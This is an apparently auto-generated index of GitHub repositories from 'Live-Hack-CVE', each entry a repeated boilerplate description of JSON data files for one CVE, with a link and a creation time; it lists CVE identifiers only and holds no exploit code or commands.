**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34865](https://github.com/Live-Hack-CVE/CVE-2021-34865) create time: 2022-12-24T06:53:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3813 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3813](https://github.com/Live-Hack-CVE/CVE-2021-3813) create time: 2022-12-24T06:53:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36775](https://github.com/Live-Hack-CVE/CVE-2021-36775) create time: 2022-12-24T06:22:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3849 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3849](https://github.com/Live-Hack-CVE/CVE-2021-3849) create time: 2022-12-24T06:22:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38427](https://github.com/Live-Hack-CVE/CVE-2021-38427) create time: 2022-12-24T06:22:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33013](https://github.com/Live-Hack-CVE/CVE-2021-33013) create time: 2022-12-24T06:22:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35249](https://github.com/Live-Hack-CVE/CVE-2021-35249) create time: 2022-12-24T06:22:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34622 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34622](https://github.com/Live-Hack-CVE/CVE-2021-34622) create time: 2022-12-24T06:22:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34626](https://github.com/Live-Hack-CVE/CVE-2021-34626) create time: 2022-12-24T06:22:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34255](https://github.com/Live-Hack-CVE/CVE-2022-34255) create time: 2022-12-24T07:04:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37063](https://github.com/Live-Hack-CVE/CVE-2022-37063) create time: 2022-12-24T07:04:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37062](https://github.com/Live-Hack-CVE/CVE-2022-37062) create time: 2022-12-24T07:04:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34918](https://github.com/Live-Hack-CVE/CVE-2022-34918) create time: 2022-12-24T07:04:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2078](https://github.com/Live-Hack-CVE/CVE-2022-2078) create time: 2022-12-24T07:04:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1852](https://github.com/Live-Hack-CVE/CVE-2022-1852) create time: 2022-12-24T07:04:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24588](https://github.com/Live-Hack-CVE/CVE-2022-24588) create time: 2022-12-24T07:04:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1962](https://github.com/Live-Hack-CVE/CVE-2022-1962) create time: 2022-12-24T07:04:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30630](https://github.com/Live-Hack-CVE/CVE-2022-30630) create time: 2022-12-24T07:04:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1705](https://github.com/Live-Hack-CVE/CVE-2022-1705) create time: 2022-12-24T07:03:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38870](https://github.com/Live-Hack-CVE/CVE-2022-38870) create time: 2022-12-24T07:03:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27191](https://github.com/Live-Hack-CVE/CVE-2022-27191) create time: 2022-12-24T07:03:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26354 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26354](https://github.com/Live-Hack-CVE/CVE-2022-26354) create time: 2022-12-24T07:02:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26353 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26353](https://github.com/Live-Hack-CVE/CVE-2022-26353) create time: 2022-12-24T07:02:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23943](https://github.com/Live-Hack-CVE/CVE-2022-23943) create time: 2022-12-24T07:02:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35821](https://github.com/Live-Hack-CVE/CVE-2022-35821) create time: 2022-12-24T07:02:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1641](https://github.com/Live-Hack-CVE/CVE-2022-1641) create time: 2022-12-24T07:02:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1639](https://github.com/Live-Hack-CVE/CVE-2022-1639) create time: 2022-12-24T07:02:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1640](https://github.com/Live-Hack-CVE/CVE-2022-1640) create time: 2022-12-24T07:02:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1637](https://github.com/Live-Hack-CVE/CVE-2022-1637) create time: 2022-12-24T07:02:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1854](https://github.com/Live-Hack-CVE/CVE-2022-1854) create time: 2022-12-24T07:02:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1853](https://github.com/Live-Hack-CVE/CVE-2022-1853) create time: 2022-12-24T07:02:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1855](https://github.com/Live-Hack-CVE/CVE-2022-1855) create time: 2022-12-24T07:02:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1865](https://github.com/Live-Hack-CVE/CVE-2022-1865) create time: 2022-12-24T07:02:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1864](https://github.com/Live-Hack-CVE/CVE-2022-1864) create time: 2022-12-24T07:02:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1863](https://github.com/Live-Hack-CVE/CVE-2022-1863) create time: 2022-12-24T07:01:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1861](https://github.com/Live-Hack-CVE/CVE-2022-1861) create time: 2022-12-24T07:01:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1860](https://github.com/Live-Hack-CVE/CVE-2022-1860) create time: 2022-12-24T07:01:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1858](https://github.com/Live-Hack-CVE/CVE-2022-1858) create time: 2022-12-24T07:01:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1857 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1857](https://github.com/Live-Hack-CVE/CVE-2022-1857) create time: 2022-12-24T07:01:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2008 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2008](https://github.com/Live-Hack-CVE/CVE-2022-2008) create time: 2022-12-24T05:36:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3167](https://github.com/Live-Hack-CVE/CVE-2012-3167) create time: 2022-12-24T06:15:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0393](https://github.com/Live-Hack-CVE/CVE-2014-0393) create time: 2022-12-24T05:35:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4802](https://github.com/Live-Hack-CVE/CVE-2015-4802) create time: 2022-12-24T05:33:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5584](https://github.com/Live-Hack-CVE/CVE-2016-5584) create time: 2022-12-24T06:15:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7440](https://github.com/Live-Hack-CVE/CVE-2016-7440) create time: 2022-12-24T06:13:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3243](https://github.com/Live-Hack-CVE/CVE-2017-3243) create time: 2022-12-24T06:13:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10286 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10286](https://github.com/Live-Hack-CVE/CVE-2017-10286) create time: 2022-12-24T06:13:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0542](https://github.com/Live-Hack-CVE/CVE-2019-0542) create time: 2022-12-24T06:17:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16011](https://github.com/Live-Hack-CVE/CVE-2019-16011) create time: 2022-12-24T06:14:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14433](https://github.com/Live-Hack-CVE/CVE-2019-14433) create time: 2022-12-24T06:13:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17545](https://github.com/Live-Hack-CVE/CVE-2019-17545) create time: 2022-12-24T05:39:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5815](https://github.com/Live-Hack-CVE/CVE-2019-5815) create time: 2022-12-24T05:30:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3407 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3407](https://github.com/Live-Hack-CVE/CVE-2020-3407) create time: 2022-12-24T06:15:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3409](https://github.com/Live-Hack-CVE/CVE-2020-3409) create time: 2022-12-24T06:15:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3403 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3403](https://github.com/Live-Hack-CVE/CVE-2020-3403) create time: 2022-12-24T06:15:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3408](https://github.com/Live-Hack-CVE/CVE-2020-3408) create time: 2022-12-24T06:14:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3315](https://github.com/Live-Hack-CVE/CVE-2020-3315) create time: 2022-12-24T06:14:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15341](https://github.com/Live-Hack-CVE/CVE-2020-15341) create time: 2022-12-24T05:39:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15347 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15347](https://github.com/Live-Hack-CVE/CVE-2020-15347) create time: 2022-12-24T05:38:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15345](https://github.com/Live-Hack-CVE/CVE-2020-15345) create time: 2022-12-24T05:38:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15346 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15346](https://github.com/Live-Hack-CVE/CVE-2020-15346) create time: 2022-12-24T05:38:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15338](https://github.com/Live-Hack-CVE/CVE-2020-15338) create time: 2022-12-24T05:38:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15343](https://github.com/Live-Hack-CVE/CVE-2020-15343) create time: 2022-12-24T05:38:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15342 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15342](https://github.com/Live-Hack-CVE/CVE-2020-15342) create time: 2022-12-24T05:38:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15339](https://github.com/Live-Hack-CVE/CVE-2020-15339) create time: 2022-12-24T05:38:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15340](https://github.com/Live-Hack-CVE/CVE-2020-15340) create time: 2022-12-24T05:38:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15344 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15344](https://github.com/Live-Hack-CVE/CVE-2020-15344) create time: 2022-12-24T05:38:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15330](https://github.com/Live-Hack-CVE/CVE-2020-15330) create time: 2022-12-24T05:38:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15337](https://github.com/Live-Hack-CVE/CVE-2020-15337) create time: 2022-12-24T05:38:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15333 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15333](https://github.com/Live-Hack-CVE/CVE-2020-15333) create time: 2022-12-24T05:38:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15334 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15334](https://github.com/Live-Hack-CVE/CVE-2020-15334) create time: 2022-12-24T05:38:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15332](https://github.com/Live-Hack-CVE/CVE-2020-15332) create time: 2022-12-24T05:37:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15331](https://github.com/Live-Hack-CVE/CVE-2020-15331) create time: 2022-12-24T05:37:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15327 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15327](https://github.com/Live-Hack-CVE/CVE-2020-15327) create time: 2022-12-24T05:37:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15325](https://github.com/Live-Hack-CVE/CVE-2020-15325) create time: 2022-12-24T05:37:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15328 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15328](https://github.com/Live-Hack-CVE/CVE-2020-15328) create time: 2022-12-24T05:37:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15326](https://github.com/Live-Hack-CVE/CVE-2020-15326) create time: 2022-12-24T05:37:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15329 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15329](https://github.com/Live-Hack-CVE/CVE-2020-15329) create time: 2022-12-24T05:37:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26705](https://github.com/Live-Hack-CVE/CVE-2020-26705) create time: 2022-12-24T05:37:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2038](https://github.com/Live-Hack-CVE/CVE-2020-2038) create time: 2022-12-24T05:36:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13299](https://github.com/Live-Hack-CVE/CVE-2020-13299) create time: 2022-12-24T05:36:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28702 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28702](https://github.com/Live-Hack-CVE/CVE-2020-28702) create time: 2022-12-24T05:33:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3655](https://github.com/Live-Hack-CVE/CVE-2021-3655) create time: 2022-12-24T06:21:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3679 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3679](https://github.com/Live-Hack-CVE/CVE-2021-3679) create time: 2022-12-24T06:21:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3499](https://github.com/Live-Hack-CVE/CVE-2021-3499) create time: 2022-12-24T06:21:13Z

